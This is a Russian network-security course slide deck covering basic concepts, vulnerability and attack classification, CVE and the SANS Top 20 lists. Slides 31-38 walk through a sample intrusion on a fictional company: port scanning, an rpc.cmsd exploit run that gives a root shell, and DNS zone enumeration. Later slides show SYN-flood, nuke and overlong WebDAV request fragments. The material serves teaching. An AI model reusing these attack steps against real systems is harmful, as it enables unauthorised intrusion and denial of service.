Слайд 1 БЕЗОПАСНОСТЬ КОМПЬТЕРНЫХ СЕТЕЙ Курс БТ03 У Ч Е Б Н Ы Й Ц Е Н Т Р ИНФОРМЗАЩИТА

Слайд 2 Разделы курса: Основы безопасности сетевых технологий Раздел 1. Основы безопасности сетевых технологий Безопасность уровня сетевого взаимодействия Безопасность уровня операционных систем (узлов) Раздел 2. Безопасность уровня сетевого взаимодействия Раздел 3. Безопасность уровня операционных систем (узлов) Основы безопасности СУБД Раздел 4. Основы безопасности СУБД Основы безопасности приложений Раздел 5. Основы безопасности приложений У Ч Е Б Н Ы Й Ц Е Н Т Р ИНФОРМЗАЩИТА

Слайд 3 ОСНОВЫ БЕЗОПАСНОСТИ СЕТЕВЫХ ТЕХНОЛОГИЙ У Ч Е Б Н Ы Й Ц Е Н Т Р ИНФОРМЗАЩИТА Раздел 1

Слайд 4 У Ч Е Б Н Ы Й Ц Е Н Т Р ИНФОРМЗАЩИТА Рассматриваемые темы Типовая корпоративная сеть Основные понятия информационной безопасности. Уязвимости и атаки Тема 1. Типовая корпоративная сеть Тема 2. Основные понятия информационной безопасности. Уязвимости и атаки Защитные механизмы и средства обеспечения безопасности Тема 3. Защитные механизмы и средства обеспечения безопасности

Слайд 5 Типовая корпоративная сеть Раздел 1 – Тема 1

Слайд 6 Типовая корпоративная сеть DMZ-2 DMZ-1 Внутренние серверы Рабочие места Филиал Мобильные сотрудники РесурсыInternet Пользователи Internet МЭ

Слайд 7 Уровни информационной инфраструктуры ПРИЛОЖЕНИЯ СУБД ОС СЕТЕВЫЕ СЛУЖБЫ ПОЛЬЗОВАТЕЛИ

Слайд 8 Уровни информационной инфраструктуры ПРИЛОЖЕНИЯ СУБД ОС СЕТЕВЫЕ СЛУЖБЫ ПОЛЬЗОВАТЕЛИ TCP/IPNetBEUIIPX/SPX

Слайд 9 Уровни информационной инфраструктуры ПРИЛОЖЕНИЯ СУБД ОС СЕТЕВЫЕ СЛУЖБЫ ПОЛЬЗОВАТЕЛИ

Слайд 10 Уровни информационной инфраструктуры ПРИЛОЖЕНИЯ СУБД ОС СЕТЕВЫЕ СЛУЖБЫ ПОЛЬЗОВАТЕЛИ

Слайд 11 Уровни информационной инфраструктуры ПРИЛОЖЕНИЯ СУБД ОС СЕТЕВЫЕ СЛУЖБЫ ПОЛЬЗОВАТЕЛИ

Слайд 12 Уровни информационной инфраструктуры ПРИЛОЖЕНИЯ СУБД ОС СЕТЕВЫЕ СЛУЖБЫ ПОЛЬЗОВАТЕЛИ

Слайд 13 DMZ-2 DMZ-1 Уровень сети - особенности Внутренние серверы Рабочие места Филиал Мобильные сотрудники РесурсыInternet Пользователи Internet МЭ Интеграция разнородных компонентов в единую систему Обеспечение дифференцированного качества обслуживания Обеспечение безопасности при взаимодействии компонентов

Слайд 14 Основные понятия информационной безопасности. Уязвимости и атаки Раздел 1 – Тема 2

Слайд 15 У Ч Е Б Н Ы Й Ц Е Н Т Р ИНФОРМЗАЩИТА Доступность информации - свойство системы (среды, инфраструктуры), в которой циркулирует информация, характеризующееся способностью обеспечивать своевременный беспрепятственный доступ субъектов к интересующей их информации и готовность соответствующих автоматизированных служб к обработке поступающих от субъектов запросов. Основные определения

Слайд 16 У Ч Е Б Н Ы Й Ц Е Н Т Р ИНФОРМЗАЩИТА Атака – WinNuke Port = 139, OOB Пример нарушения доступности

Слайд 17 У Ч Е Б Н Ы Й Ц Е Н Т Р ИНФОРМЗАЩИТА Целостность информации - свойство информации (системы ее обработки), заключающееся в ее существовании в неискаженном виде (неизменном по отношению к некоторому фиксированному ее состоянию). Основные определения

Слайд 18 У Ч Е Б Н Ы Й Ц Е Н Т Р ИНФОРМЗАЩИТА Атака – троянский конь Пример нарушения целостности

Слайд 19 У Ч Е Б Н Ы Й Ц Е Н Т Р ИНФОРМЗАЩИТА Конфиденциальность информации - субъективно определяемая (приписываемая) характеристика (свойство) информации, указывающая на необходимость введения ограничений на круг субъектов, имеющих доступ к данной информации, и обеспечиваемая способностью системы (среды) сохранять указанную информацию в тайне от субъектов, не имеющих полномочий на доступ к ней. Основные определения

Слайд 20 Атака – прослушивание трафика Пример нарушения конфиденциальности

Слайд 21 У Ч Е Б Н Ы Й Ц Е Н Т Р ИНФОРМЗАЩИТА Атака - действие нарушителя, которое приводит к реализации угрозы путем использования уязвимостей информационной системы. Угроза - потенциально возможное событие, явление или процесс, которое воздействуя на компоненты информационной системы может привести к нанесению ущерба. Уязвимость - любая характеристика или свойство информационной системы, использование которой нарушителем может привести к реализации угрозы. Угрозы, уязвимости и атаки

Слайд 22 При обмене данными существует угроза их перехвата Уязвимость, приводящая к реализации угрозы, - особенность технологии «Ethernet» - общая среда передачи Атака, использующая уязвимость – запуск сетевого анализатора Взаимосвязь определений

Слайд 23 Примерный сценарий атаки Сбор информации Анализ и переработка собранных сведений, выбор целей атаки Реализация атаки Поиск инструментов для использования предполагаемых уязвимостей

Слайд 24 Сбор информации

Слайд 25 WHOIS Search Из общедоступных источников Из общедоступных источников

Слайд 26 ACMETRADE.COM

Слайд 27 Registrant: Acmetrade.com, Inc. (ACMETRADE-DOM) 6600 Peachtree Dunwoody Road Atlanta, GA Domain Name: ACMETRADE.COM Administrative Contact: Vaughn, Danon (ES2394) (678) (FAX) (678) Technical Contact, Zone Contact: Bergman, Bret (ET2324) (678) (FAX) (678) Billing Contact: Fields, Hope (ET3427) (678) (FAX) (678) Record Last updated on 27-Jul-99. Record created on 06-Mar-98. Database last updated on 4-Oct-99 09:09:01 EDT Domain servers in listed order: dns.acmetrade.com www1.acmetrade.com www2.acmetrade.com

Слайд 28

Слайд 29 Информация из базы DNS-сервера

Слайд 30 Информация из базы DNS-сервера

Слайд 31 hacker]$ nmap Starting nmap V by ( ) Interesting ports on ( ): (The 1516 ports scanned but not shown below are in state: closed) Port State Service 21/tcp open ftp 25/tcp open smtp 80/tcp open http 135/tcp open loc-srv 139/tcp open netbios-ssn 443/tcp open https 465/tcp open smtps Nmap run completed -- 1 IP address (1 host up) scanned in 1 second hacker]$ Сканирование портов, идентификация служб и ОС

Слайд 32 hacker:/export/home/hacker>./rpcscan dns.acmetrade.com cmsd Scanning dns.acmetrade.com for program cmsd is on port hacker:/export/home/hacker>

Слайд 33 UNIX Firewall DNS Server Web Server Filtering Router NT Clients & Workstations Network UNIX NTUNIX Анализ трафика

Слайд 34 (Схема сети) UNIX Firewall DNS Server Web Server Filtering Router NT Clients & Workstations Network UNIX NTUNIX rpc.cmsd Анализ и переработка собранных сведений

Слайд 35 Поиск инструментов

Слайд 36 Поиск инструментов

Слайд 37 hacker:/export/home/hacker> id uid=1002(hacker) gid=10(staff) hacker:/export/home/hacker> uname -a SunOS evil.hacker.com 5.6 Generic_ sun4u sparc SUNW,UltraSPARC-IIi-Engine hacker:/export/home/hacker>./cmsd dns.acmetrade.com using source port 53 rtable_create worked Exploit successful. Portshell created on port hacker:/export/home/hacker> Trying Connected to dns.acmetrade.com. Escape character is '^]'. # id uid=0(root) gid=0(root) # uname -a SunOS dns Generic_ sun4m sparc SUNW,SPARCstation-5 # telnet dns.acmetrade.com Реализация атаки

Слайд 38 # # nslookup Default Server: dns.acmetrade.com Address: > > ls acmetrade.com Received 15 records. ^D [dns.acmetrade.com] www1.acmetrade.com www2.acmetrade.com margin.acmetrade.com marketorder.acmetrade.com deriv.acmetrade.com deriv1.acmetrade.com bond.acmetrade.com ibd.acmetrade.com fideriv.acmetrade.com backoffice.acmetrade.com wiley.acmetrade.com bugs.acmetrade.com fw.acmetrade.com fw1.acmetrade.com Использование узла в качестве платформы для исследования других узлов сети

Слайд 39 Классификация уязвимостей узлов, протоколов и служб IP - сетей узлов, протоколов и служб IP - сетей

Слайд 40 Классификация уязвимостей по причинам возникновения ошибки проектирования (технологий, протоколов, служб) ошибки реализации (программ) ошибки эксплуатации (неправильная настройка, неиспользуемые сетевые службы, слабые пароли)

Слайд 41 Классификация по уровню в информационной инфраструктуре Уровень сети Уровень операционной системы Уровень баз данных Уровень персонала Уровень приложений

Слайд 42 Классификация уязвимостей по уровню (степени) риска Высокий Высокий уровень риска Средний Средний уровень риска Низкий Низкий уровень риска Уязвимости, позволяющие атакующему сразу получить доступ у узлу с правами суперпользователя Уязвимости, позволяющие атакующему получить доступ к информации, которая с высокой степенью вероятности позволит впоследствии получить доступ к узлу Уязвимости, позволяющие злоумышленнику осуществлять сбор критичной информации о системе

Слайд 43 Общедоступные базы данных уязвимостей - координационный центр CERT/CC - база данных компании ISS - центр CIAC

Слайд 44 Примеры уязвимостей Уровень: Уровень: СУБД Название: Название: sql-slammer-worm (11153) Описание Описание: переполнение буфера в реализации службы разрешения имён в СУБД Microsoft SQL Server может привести к «отказу в обслуживании» или к запуску произвольного кода путём посылки специальным образом построенных UDP-пакетов на порт Степень риска: Степень риска: высокая Источник возникновения: Источник возникновения: ошибки реализации CVE: CVE: CAN

Слайд 45 Единая система наименований для уязвимостей Стандартное описание для каждой уязвимости Обеспечение совместимости баз данных уязвимостей

Слайд 46 CAN CVE Кандидат CVE Индекс CVE

Слайд 47 Ситуация без CVE ISS RealSecure CERT Advisory Cisco Database Axent NetRecon land attack (spoofed SYN) Impossible IP Packet Bugtrag CA Teardrop_Land Land NT4-SP3and 95 [latierra.c] Уязвимость Land IP denial of service

Слайд 48 Поддержка CVE CVE Land IP denial of service CVE CERT Advisory Bugtrag ISS RealSecure Cisco Database Axent NetRecon

Слайд 49 CVE entry (sql-slammer-worm) CAN (under review) Multiple buffer overflows in SQL Server 2000 Resolution Service allow remote attackers to cause a denial of service or execute arbitrary code via UDP packets to port 1434 in which (1) a 0x04 byte causes the SQL Monitor thread to generate a long registry key name, or (2) a 0x08 byte with a long string causes heap corruption.. BUGTRAQ: Microsoft SQL Server 2000 Unauthenticated System Compromise (#NISR ) URL: NTBUGTRAQ: Microsoft SQL Server 2000 Unauthenticated System Compromise (#NISR ) URL: MS:MS URL: asp Номер Описание Ссылки

Слайд 50 Жизненный цикл уязвимости Обнаружение (Публикация Обсуждение) Анализ (Классификация) Сохранение (появление обновлений для сканеров уязвимостей) Защита (Рекомендации по защите) Обнаружение атак (настройка) Разбор инцидентов

Слайд 51 Классификация атак в IP- сетях

Слайд 52 Классификация атак по целям Нарушение нормального функционирования Нарушение нормального функционирования объекта атаки (отказ в обслуживании) объекта атаки (отказ в обслуживании) Получение конфиденциальной информации Получение конфиденциальной информации Модификация или фальсификация Модификация или фальсификация критичных данных критичных данных Получение полного контроля над Получение полного контроля над объектом атаки объектом атаки

Слайд 53 Классификация атак по местонахождению атакующего и объекта атаки Атакующий и объект атаки находятся в одном сегменте Атакующий и объект атаки находятся в разных сегментах Маршру- тизатор

Слайд 54 Классификация атак по механизмам реализации Пассивное прослушивание

Слайд 55 Пассивное прослушивание DMZ-2 DMZ-1 Внутренние серверы МЭ Чтение почты

Слайд 56 Классификация атак по механизмам реализации Подозрительная активность (разведка) Пассивное прослушивание

Слайд 57 DMZ-2 DMZ-1 Определение ОС узла Внутренние серверы Рабочие места МЭ # nmap –O –vv

Слайд 58 Классификация атак по механизмам реализации Подозрительная активность (разведка) Бесполезное расходование вычислительных ресурсов (перегрузка) Пассивное прослушивание

Слайд 59 DMZ-2 DMZ-1 Перегрузка Перегрузка Внутренние серверы Рабочие места МЭ #./ neptun

Слайд 60 Классификация атак по механизмам реализации Подозрительная активность (разведка) Бесполезное расходование вычислительных ресурсов (перегрузка) Нарушение навигации (ложный маршрут) Пассивное прослушивание

Слайд 61 DMZ-2 DMZ-1 Нарушение навигации Внутренние серверы Рабочие места РесурсыInternet МЭ DNSсервер

Слайд 62 Классификация атак по механизмам реализации Провоцирование отказа объекта (компонента) Подозрительная активность (разведка) Бесполезное расходование вычислительных ресурсов (перегрузка) Нарушение навигации (ложный маршрут) Пассивное прослушивание

Слайд 63 DMZ-2 DMZ-1 Провоцирование отказа Внутренние серверы Рабочие места МЭ # nuke

Слайд 64 Классификация атак по механизмам реализации Провоцирование отказа объекта (компонента) Подозрительная активность (разведка) Запуск кода (программы) на объекте атаки Бесполезное расходование вычислительных ресурсов (перегрузка) Нарушение навигации (ложный маршрут) Пассивное прослушивание

Слайд 65 DMZ-2 DMZ-1 Пример: уязвимость WebDAV Внутренние серверы Рабочие места МЭ # WebDAV НТТР-запрос: SEARCH /xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxx….. …xxxxx HTTP/1.1 Host: Content-Type: text/xml Content-Length: 137 Select "DAV:displayname" from scope()

Слайд 66 Классификация атак по механизмам реализации Провоцирование отказа объекта (компонента) Подозрительная активность (разведка) Запуск кода (программы) на объекте атаки Бесполезное расходование вычислительных ресурсов (перегрузка) Нарушение навигации (ложный маршрут) Пассивное прослушивание

Слайд 67 Top 20 Уязвимости Windows-систем W1 Internet Information Services (IIS) W1 Internet Information Services (IIS) W2 Microsoft Data Access Components (MDAC) -- Remote Data Services W2 Microsoft Data Access Components (MDAC) -- Remote Data Services W3 Microsoft SQL Server W3 Microsoft SQL Server W4 NETBIOS -- Unprotected Windows Networking Shares W4 NETBIOS -- Unprotected Windows Networking Shares W5 Anonymous Logon -- Null Sessions W5 Anonymous Logon -- Null Sessions W6 LAN Manager Authentication -- Weak LM Hashing W6 LAN Manager Authentication -- Weak LM Hashing W7 General Windows Authentication -- Accounts with No Passwords or Weak Passwords W7 General Windows Authentication -- Accounts with No Passwords or Weak Passwords W8 Internet Explorer W8 Internet Explorer W9 Remote Registry Access W9 Remote Registry Access W10 Windows Scripting Host W10 Windows Scripting Hosthttp://

Слайд 68 Top 20 Уязвимости Unix-систем U1 Remote Procedure Calls (RPC) U1 Remote Procedure Calls (RPC) U2 Apache Web Server U2 Apache Web Server U3 Secure Shell (SSH) U3 Secure Shell (SSH) U4 Simple Network Management Protocol (SNMP) U4 Simple Network Management Protocol (SNMP) U5 File Transfer Protocol (FTP) U5 File Transfer Protocol (FTP) U6 R-Services -- Trust Relationships U6 R-Services -- Trust Relationships U7 Line Printer Daemon (LPD) U7 Line Printer Daemon (LPD) U8 Sendmail U8 Sendmail U9 BIND/DNS U9 BIND/DNS U10 General Unix Authentication -- Accounts with No Passwords or Weak Passwords U10 General Unix Authentication -- Accounts with No Passwords or Weak Passwordshttp://